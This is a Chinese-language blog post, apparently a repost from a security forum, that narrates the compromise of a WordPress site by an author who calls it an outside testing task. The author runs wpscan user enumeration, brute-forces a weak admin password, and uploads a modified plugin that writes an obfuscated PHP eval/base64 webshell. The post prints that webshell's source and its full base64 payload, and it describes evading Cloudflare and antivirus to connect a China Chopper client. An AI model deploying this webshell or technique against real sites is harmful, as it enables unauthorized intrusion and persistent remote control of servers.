记述一件几年前的对外测试任务

2020-04-23 约 82 字 预计阅读 1 分钟

声明:本文 【记述一件几年前的对外测试任务】 由作者 勿忘在莒 于 2020-04-23 09:15:10 首发 先知社区 曾经 浏览数 44 次

感谢 勿忘在莒 的辛苦付出!

接到XX的指示,需要处理一件违禁物品的case。
目标网站:http://*********.co.uk/site/index.htm

查看主域名 http://www.********.co.uk/

CMS为WordPress。卖货的原来是开在英国服务器的寄生站,说明主站已被getshell了。
信息搜集差不多开始切入,根据wpcms目录结构查找后台 http://www.*********.co.uk/wp-login.php


用wpscan工具 对网站进行辅助嗅探(信息搜集要善用强大的工具)

wpscan --url http://www.*******.co.uk --enumerate u


可获得wordpress版本及插件版本信息,敏感目录,用户名


对用户名进行密码爆破,得到密码pass,成功登录后台(弱口令是诸多成功渗透案例的原因)


尝试寻找上传点传图片马,但是上传校验严格,未找到上传点,编辑插件plugins 404出错,无法将一句话编辑入插件(遇到了些许困难,渗透过程从来不是一帆风顺)


尝试百度wordprss插件下载,然后本地修改再上传插件激活(这是一个思路)
解压插件,改其中一个文件:利用file_put_contents(“xx.php”,’字符串’)写入一句话


这里需要注意判断并找到一句话最后的写入目录(../ma.php,or../../ma.php,or../../../ma.php,or....自己找)
最后为../aaaa.php 测试写入phpinfo()测试,成功
接下来就是怎么连了,cloudfire的缘故无法直接连接菜刀,主机存在杀毒软件,采用:变形老一句话,base64中转连接
变形老一句话

@eval(base64_decode($_POST['chop']));
QGVs2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2Nob3AnXSkpOw==

注意第四个s,s为下方$vbl去除的字符(也是为了混淆)

<?php $uf="BPU1";
$ka="QGVs2YWwoYmFzZT";
$pjt="Y0X2RlY29kZSgkX1";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice"); $iqw="RbJ2Nob3AnXSkpOw==";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp("", $bkf($vbl("s","", $ka.$pjt.$uf.$iqw))); $mpy(); ?>css_conf

最后合并为一行,Base64编码

PD9waHAgJHVmPSJCUFUxIjsgJGthPSJRR1ZzMllXd29ZbUZ6WlQiOyAkcGp0PSJZMFgyUmxZMjlrWlNna1gxIjsgJHZibCA9IHN0cl9yZXBsYWNlKCJ0aSIsIiIsInRpc3RpdHRpcnRpX3J0aWV0aXBsdGlhdGljZSIpOyAkaXF3PSJSYkoyTm9iM0FuWFNrcE93PT0iOyAkYmtmID0gJHZibCgiayIsICIiLCAia2Jha3NrZTZrNGtfa2RrZWtja29rZGtlIik7ICRzYnAgPSAkdmJsKCJjdHciLCIiLCJjdHdjY3R3cmVjdHdhdGN0d2VjdHdfZmN0d3VuY2N0d3RjdHdpb2N0d24iKTsgJG1weSA9ICRzYnAoIiIsICRia2YoJHZibCgicyIsIiIsICRrYS4kcGp0LiR1Zi4kaXF3KSkpOyAkbXB5KCk7ID8+Y3NzX2NvbmY=

利用刚才的插件写入

file_put_contents("../llll.php",base64_decode('PD9waHAgJHVmPSJCUFUxIjsgJGthPSJRR1ZzMllXd29ZbUZ6WlQiOyAkcGp0PSJZMFgyUmxZMjlrWlNna1gxIjsgJHZibCA9IHN0cl9yZXBsYWNlKCJ0aSIsIiIsInRpc3RpdHRpcnRpX3J0aWV0aXBsdGlhdGljZSIpOyAkaXF3PSJSYkoyTm9iM0FuWFNrcE93PT0iOyAkYmtmID0gJHZibCgiayIsICIiLCAia2Jha3NrZTZrNGtfa2RrZWtja29rZGtlIik7ICRzYnAgPSAkdmJsKCJjdHciLCIiLCJjdHdjY3R3cmVjdHdhdGN0d2VjdHdfZmN0d3VuY2N0d3RjdHdpb2N0d24iKTsgJG1weSA9ICRzYnAoIiIsICRia2YoJHZibCgicyIsIiIsICRrYS4kcGp0LiR1Zi4kaXF3KSkpOyAkbXB5KCk7ID8+Y3NzX2NvbmY='));

将文件添加入压缩包

上传插件,并激活


激活插件,执行写入文件


访问shell地址,可以写入


你有cloudfire我有php的base64中转脚本连接


这里还连接失败了一次,尝试添加登录后台cookie继续,成功开启脚本(指定一个未占用端口 9900)


可以菜刀了

没什么技术含量,翻翻旧账,丰富下先知的娱乐生活。轻点喷

关键词:[‘渗透测试’, ‘渗透测试’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now